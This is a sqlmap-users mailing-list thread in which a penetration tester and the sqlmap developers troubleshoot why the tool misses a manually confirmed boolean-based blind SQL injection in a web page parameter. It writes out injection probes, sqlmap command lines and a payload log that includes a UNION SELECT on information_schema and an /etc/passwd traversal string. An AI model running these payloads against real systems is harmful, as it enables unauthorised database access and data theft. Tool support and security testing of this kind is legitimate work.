OK. You're right in that the following lines in your dummy output
should produce discernable responses when tested against the
application:
PackageSelection' AND 1595=1103 AND 'cBLQ'='cBLQ
PackageSelection' AND 1559=1559 AND 'uIvd'='uIvd

I've verified this manually. Thanks and I'll send you the traffic output file.

Cheers,

Alistair.

On Wed, Apr 29, 2015 at 4:57 PM, Miroslav Stampar
<miroslav.stam...@gmail.com> wrote:
> I would say that you screwed something up. Can you please send that traffic
> file I requested.
>
> Down below find a line that says: "[08:55:08] [PAYLOAD] PackageSelection'
> AND 1595=1103 AND 'cBLQ'='cBLQ". That is the proof that your claims are
> invalid.
>
> $ python sqlmap.py -u www.site.com/help/UserGuide.aspx?Sec=PackageSelection
> --dummy -v 3
>          _
>  ___ ___| |_____ ___ ___  {1.0-dev-03f32ae}
> |_ -| . | |     | .'| . |
> |___|_  |_|_|_|_|__,|  _|
>       |_|           |_|   http://sqlmap.org
>
> [!] legal disclaimer: Usage of sqlmap for attacking targets without prior
> mutual consent is illegal. It is the end user's responsibility to obey all
> applicable local, state and federal laws. Developers assume no liability and
> are not responsible for any misuse or damage caused by this program
>
> [*] starting at 08:55:05
>
> [08:55:05] [DEBUG] cleaning up configuration parameters
> [08:55:05] [DEBUG] setting the HTTP timeout
> [08:55:05] [DEBUG] creating HTTP requests opener object
> [08:55:05] [DEBUG] heuristically checking if the target is protected by some
> kind of WAF/IPS/IDS
> [08:55:05] [PAYLOAD] WVJJ=8692 AND 1=1 UNION ALL SELECT 1,2,3,table_name
> FROM information_schema.tables WHERE 2>1-- ../../../etc/passwd
> [08:55:05] [DEBUG] setting match ratio for current parameter to 0.743
> [08:55:05] [INFO] testing if the target URL is stable. This can take a
> couple of seconds
> [08:55:06] [WARNING] target URL is not stable. sqlmap will base the page
> comparison on a sequence matcher. If no dynamic nor injectable parameters
> are detected, or in case of junk results, refer to user's manual paragraph
> 'Page comparison' and provide a string or regular expression to match on
> how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit]
> [08:55:08] [INFO] searching for dynamic content
> [08:55:08] [DEBUG] setting match ratio for current parameter to 0.446
> [08:55:08] [CRITICAL] target URL is heavily dynamic. sqlmap is going to
> retry the request
> [08:55:08] [INFO] searching for dynamic content
> [08:55:08] [INFO] testing if GET parameter 'Sec' is dynamic
> [08:55:08] [PAYLOAD] 2485
> [08:55:08] [DEBUG] setting match ratio for current parameter to 0.867
> [08:55:08] [INFO] confirming that GET parameter 'Sec' is dynamic
> [08:55:08] [PAYLOAD] 8682
> [08:55:08] [INFO] GET parameter 'Sec' is dynamic
> [08:55:08] [PAYLOAD] PackageSelection)"'.)"").'
> [08:55:08] [WARNING] heuristic (basic) test shows that GET parameter 'Sec'
> might not be injectable
> [08:55:08] [PAYLOAD] PackageSelection'LcAd<'">Hovs
> [08:55:08] [INFO] testing for SQL injection on GET parameter 'Sec'
> [08:55:08] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
> [08:55:08] [PAYLOAD] PackageSelection) AND 4774=3078 AND (8643=8643
> [08:55:08] [DEBUG] setting match ratio for current parameter to 0.833
> [08:55:08] [PAYLOAD] PackageSelection) AND 1559=1559 AND (3186=3186
> [08:55:08] [PAYLOAD] PackageSelection AND 8581=4897
> [08:55:08] [DEBUG] setting match ratio for current parameter to 0.851
> [08:55:08] [PAYLOAD] PackageSelection AND 1559=1559
> [08:55:08] [PAYLOAD] PackageSelection') AND 6273=6522 AND ('YHvu'='YHvu
> [08:55:08] [DEBUG] setting match ratio for current parameter to 0.554
> [08:55:08] [PAYLOAD] PackageSelection') AND 1559=1559 AND ('sTiQ'='sTiQ
> [08:55:08] [PAYLOAD] PackageSelection') AND 3601=4813 AND ('ParN'='ParN
> [08:55:08] [PAYLOAD] PackageSelection' AND 1595=1103 AND 'cBLQ'='cBLQ
> [08:55:08] [DEBUG] setting match ratio for current parameter to 0.745
> [08:55:08] [PAYLOAD] PackageSelection' AND 1559=1559 AND 'uIvd'='uIvd
> [08:55:08] [PAYLOAD] PackageSelection' AND 8619=5317 AND 'RtrE'='RtrE
> [08:55:08] [PAYLOAD] PackageSelection%' AND 3991=4465 AND '%'='
> [08:55:08] [DEBUG] setting match ratio for current parameter to 0.495
> [08:55:08] [PAYLOAD] PackageSelection%' AND 1559=1559 AND '%'='
> [08:55:08] [PAYLOAD] PackageSelection%' AND 5263=7541 AND '%'='
> [08:55:08] [PAYLOAD] PackageSelection AND 8168=8736-- pZYt
> [08:55:08] [DEBUG] setting match ratio for current parameter to 0.685
> [08:55:08] [PAYLOAD] PackageSelection AND 1559=1559-- NfAy
> ...
>
> On Tue, Apr 28, 2015 at 3:15 PM, Alistair Johnson <amcljohn...@gmail.com>
> wrote:
>>
>> Hi Brandon,
>>
>> Thanks for your comment. Confirming that i've tried risk=3 with
>> level=5 with the same results. I've looked more closely at the
>> requests that sqlmap is sending to check if the parameter is
>> injectable. It is testing the Sec paramater with values such as:
>>
>> PackageSelection) AND 1477=7114
>> PackageSelection) AND 1631=1631
>> PackageSelection') AND 5603=7729
>> PackageSelection') AND 1631=1631
>> PackageSelection' AND 3943=9381
>> PackageSelection' AND 1631=1631
>> PackageSelection" AND 3324=4690
>> PackageSelection" AND 1631=1631
>> PackageSelection) AND 4734=6616 AND (6346=6346
>> PackageSelection)) AND 7350=9272 AND (8861=8861
>>
>> When in fact, i assume it would need to use logic like I used to get
>> distinguishable responses:
>>
>> PackageSelection (returns response A)
>> PackageSelection' AND '1'='1 (returns response A)
>> PackageSelection' AND '1'='2 (returns response B)
>>
>> In a nutshell, it doesn't appear to be trying single quotes and values
>> in the ' AND '1'='1 pattern. But i would have thought this is a pretty
>> typical format for checking boolean-based blind SQLi.
>>
>> Cheers,
>>
>> Alistair.
>>
>> On Tue, Apr 28, 2015 at 10:36 PM, Brandon Perry
>> <bperry.volat...@gmail.com> wrote:
>> > It's a GET, so there wouldn't be a content type, unless I am mistaken.
>> >
>> > Alistair, have you tried --risk=3 with --level=5 yet?
>> >
>> > Sent from a phone
>> >
>> > On Apr 28, 2015, at 7:13 AM, Miroslav Stampar
>> > <miroslav.stam...@gmail.com>
>> > wrote:
>> >
>> > Can you please send the unredacted content of request.txt to my address?
>> >
>> > If not, then please at least send me the content of traffic file which
>> > you
>> > can obtain by just appending the "-t traffic.txt" to the regular
>> > sqlmap's
>> > run.
>> >
>> > Bye
>> >
>> > On Tue, Apr 28, 2015 at 2:10 PM, Alistair Johnson
>> > <amcljohn...@gmail.com>
>> > wrote:
>> >>
>> >> Thanks for the quick reply.
>> >>
>> >> The contents of the request file are as follows:
>> >>
>> >> GET /help/UserGuide.aspx?Sec=PackageSelection HTTP/1.1
>> >> Host: <redacted>
>> >> Accept: */*
>> >> Accept-Language: en
>> >> User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64;
>> >> x64; Trident/5.0)
>> >> Connection: close
>> >> Referer: <redacted>
>> >> Cookie: <redacted>
>> >>
>> >> I've redacted some of the details as it's not appropriate to draw
>> >> attention to an internet facing application's SQLi vulnerability.
>> >>
>> >> When providing the request file as part of the following command:
>> >> sqlmap -r '<request file>' -p 'Sec' --dbms 'Microsoft SQL Server'
>> >> --level=4 --proxy=http://127.0.0.1:8080 --technique=B --string
>> >> 'industries' -v 1
>> >>
>> >> sqlmap executes as normal but cannot identify (and therefore cannot
>> >> exploit) the boolean-based blind vulnerability which I've verified
>> >> manually.
>> >>
>> >> Thanks again,
>> >>
>> >> Al.
>> >>
>> >>
>> >> On Tue, Apr 28, 2015 at 9:59 PM, Miroslav Stampar
>> >> <miroslav.stam...@gmail.com> wrote:
>> >> > And what is the content of request file?
>> >> >
>> >> > Bye
>> >> >
>> >> > On Tue, Apr 28, 2015 at 1:03 PM, Alistair Johnson
>> >> > <amcljohn...@gmail.com>
>> >> > wrote:
>> >> >>
>> >> >> Hi sqlmappers,
>> >> >>
>> >> >> I'm a fairly experienced user of sqlmap having used it extensively
>> >> >> in
>> >> >> the past. I came across what appeared to pretty typical
>> >> >> boolean-based
>> >> >> blind SQLi in an application I'm (legally) testing. However, for the
>> >> >> first time, I'm unable to get sqlmap to recognise the parameter as
>> >> >> vulnerable to exploit it further. And as we know, manually
>> >> >> exploiting
>> >> >> blind SQLi is cumbersome to say the least.
>> >> >>
>> >> >> Here is a summary of the requests i've made to manually confirm the
>> >> >> vulnerability.
>> >> >>
>> >> >> /help/UserGuide.aspx?Sec=PackageSelection (returns response A)
>> >> >> /help/UserGuide.aspx?Sec=PackageSelection'+and+'1'='1 (returns
>> >> >> response
>> >> >> A)
>> >> >> /help/UserGuide.aspx?Sec=PackageSelection'+and+'1'='2 (returns
>> >> >> response
>> >> >> B)
>> >> >>
>> >> >> I've tried various sqlmap flags and thought the following command
>> >> >> would give me the best chance of success:
>> >> >>
>> >> >> sqlmap -r '<request file>' -p 'Sec' --dbms 'Microsoft SQL Server'
>> >> >> --level=4 --proxy=http://127.0.0.1:8080 --technique=B --string
>> >> >> 'industries' -v 1
>> >> >>
>> >> >> Note: the string 'industries' is text that appears in response A but
>> >> >> not response B.
>> >> >>
>> >> >> I've looked at the requests that sqlmap is sending in the background
>> >> >> (proxied through burp). It appears that it's attempting to exploit
>> >> >> this with the AND statement as it should but is not using single
>> >> >> quotes as per my example above.
>> >> >>
>> >> >> I'd appreciate any insight. If this is a shortcoming in sqlmap, i'd
>> >> >> be
>> >> >> more than happy to contribute some time to improve it so it can
>> >> >> identify injectable parameters such as these in the future.
>> >> >>
>> >> >> Thanks,
>> >> >>
>> >> >> Al.
>> >> >>
>> >> >>
>> >> >>
>> >> >>
>> >> >> ------------------------------------------------------------------------------
>> >> >> One dashboard for servers and applications across
>> >> >> Physical-Virtual-Cloud
>> >> >> Widest out-of-the-box monitoring support with 50+ applications
>> >> >> Performance metrics, stats and reports that give you Actionable
>> >> >> Insights
>> >> >> Deep dive visibility with transaction tracing using APM Insight.
>> >> >> http://ad.doubleclick.net/ddm/clk/290420510;117567292;y
>> >> >> _______________________________________________
>> >> >> sqlmap-users mailing list
>> >> >> sqlmap-users@lists.sourceforge.net
>> >> >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>> >> >
>> >> >
>> >> >
>> >> >
>> >> > --
>> >> > Miroslav Stampar
>> >> > http://about.me/stamparm
>> >
>> >
>> >
>> >
>> > --
>> > Miroslav Stampar
>> > http://about.me/stamparm
>> >
>> >
>> > ------------------------------------------------------------------------------
>> > One dashboard for servers and applications across Physical-Virtual-Cloud
>> > Widest out-of-the-box monitoring support with 50+ applications
>> > Performance metrics, stats and reports that give you Actionable Insights
>> > Deep dive visibility with transaction tracing using APM Insight.
>> > http://ad.doubleclick.net/ddm/clk/290420510;117567292;y
>> >
>> > _______________________________________________
>> > sqlmap-users mailing list
>> > sqlmap-users@lists.sourceforge.net
>> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm

------------------------------------------------------------------------------
One dashboard for servers and applications across Physical-Virtual-Cloud 
Widest out-of-the-box monitoring support with 50+ applications
Performance metrics, stats and reports that give you Actionable Insights
Deep dive visibility with transaction tracing using APM Insight.
http://ad.doubleclick.net/ddm/clk/290420510;117567292;y
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users

Reply via email to